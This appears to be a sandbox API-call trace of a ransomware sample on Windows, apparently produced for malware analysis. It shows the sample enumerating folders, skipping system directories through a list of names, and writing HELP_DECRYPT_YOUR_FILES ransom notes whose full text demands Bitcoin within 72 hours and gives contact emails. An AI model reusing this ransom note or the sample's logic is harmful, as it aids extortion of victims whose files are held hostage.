	[0170.556] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\") returned="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\"
	[0170.556] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\") returned="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\"
	[0170.556] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*.*") returned="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*.*"
	[0170.669] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*.*" (normalized: "c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0170.670] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*.*") returned 61
	[0170.670] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0170.670] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*.*", cchLength=0x3d | out: lpsz="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*") returned 0x3d
	[0170.670] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.670] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="windows") returned 0x0
	[0170.670] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.670] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="boot") returned 0x0
	[0170.670] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.671] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="system volume information") returned 0x0
	[0170.671] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.671] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0170.671] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.671] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="temp") returned 0x0
	[0170.671] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.671] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="program files") returned 0x0
	[0170.672] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.672] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="program files (x86)") returned 0x0
	[0170.672] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.672] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="appdata") returned 0x0
	[0170.672] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.672] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="application data") returned 0x0
	[0170.672] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.673] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="winnt") returned 0x0
	[0170.673] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.673] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="tmp") returned 0x0
	[0170.673] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.673] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="cache") returned 0x0
	[0170.673] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.673] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="temporary internet files") returned 0x0
	[0170.673] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.674] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="webcache") returned 0x0
	[0170.674] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.674] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="inetcache") returned 0x0
	[0170.674] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.674] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="nvidia") returned 0x0
	[0170.674] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.674] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="packages") returned 0x0
	[0170.674] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.675] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="cookies") returned 0x0
	[0170.675] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.675] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="programdata") returned 0x0
	[0170.675] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0170.675] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0170.675] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0170.676] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0170.676] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore" | out: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore") returned="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore"
	[0170.676] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*.*") returned="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*.*"
	[0170.676] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0170.676] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0170.677] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\HELP_DECRYPT_YOUR_FILES.TXT") returned 85
	[0170.677] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0170.677] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0170.678] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0170.681] CloseHandle (hObject=0x388) returned 1
	[0170.682] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0170.683] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0170.683] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0170.684] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0170.684] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0170.684] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0170.685] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0170.685] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0170.685] CloseHandle (hObject=0x388) returned 1
	[0170.685] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0170.686] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0170.686] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0170.686] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\HELP_DECRYPT_YOUR_FILES.HTML") returned 86
	[0170.686] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0170.687] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0170.687] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0170.690] CloseHandle (hObject=0x388) returned 1
	[0170.690] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0170.690] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0170.691] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0170.691] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0170.692] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0170.692] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0170.693] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0170.693] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0170.693] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0170.693] CloseHandle (hObject=0x388) returned 1
	[0170.694] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*.*" (normalized: "c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7f44b5da, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0170.694] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*.*") returned 61
	[0170.694] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0170.695] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*.*", cchLength=0x3d | out: lpsz="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*") returned 0x3d
	[0170.695] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.695] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="windows") returned 0x0
	[0170.695] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.695] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="boot") returned 0x0
	[0170.695] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.695] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="system volume information") returned 0x0
	[0170.696] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.696] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0170.696] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.696] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="temp") returned 0x0
	[0170.696] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.696] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="program files") returned 0x0
	[0170.696] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.698] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="program files (x86)") returned 0x0
	[0170.698] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.698] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="appdata") returned 0x0
	[0170.699] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.699] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="application data") returned 0x0
	[0170.699] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.699] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="winnt") returned 0x0
	[0170.699] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.699] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="tmp") returned 0x0
	[0170.699] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.700] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="cache") returned 0x0
	[0170.700] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.700] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="temporary internet files") returned 0x0
	[0170.700] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.700] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="webcache") returned 0x0
	[0170.700] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.700] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="inetcache") returned 0x0
	[0170.700] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.701] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="nvidia") returned 0x0
	[0170.701] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.701] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="packages") returned 0x0
	[0170.701] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.701] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="cookies") returned 0x0
	[0170.701] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.701] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\*.*", lpSrch="programdata") returned 0x0
	[0170.702] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0170.702] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0170.702] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7f44b5da, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0170.702] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0170.702] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f44b5da, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7f44b5da, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7f44b5da, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0170.702] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f42545b, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7f42545b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7f44b5da, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0170.702] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f42545b, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7f42545b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7f44b5da, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0170.702] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0170.703] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0170.703] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f2d0add, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7f2d0add, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7f2f3dbe, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0170.703] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f2a7add, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7f2a7add, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7f2d0add, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0170.703] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f2a7add, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7f2a7add, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7f2d0add, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0170.704] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0170.704] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0170.704] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1
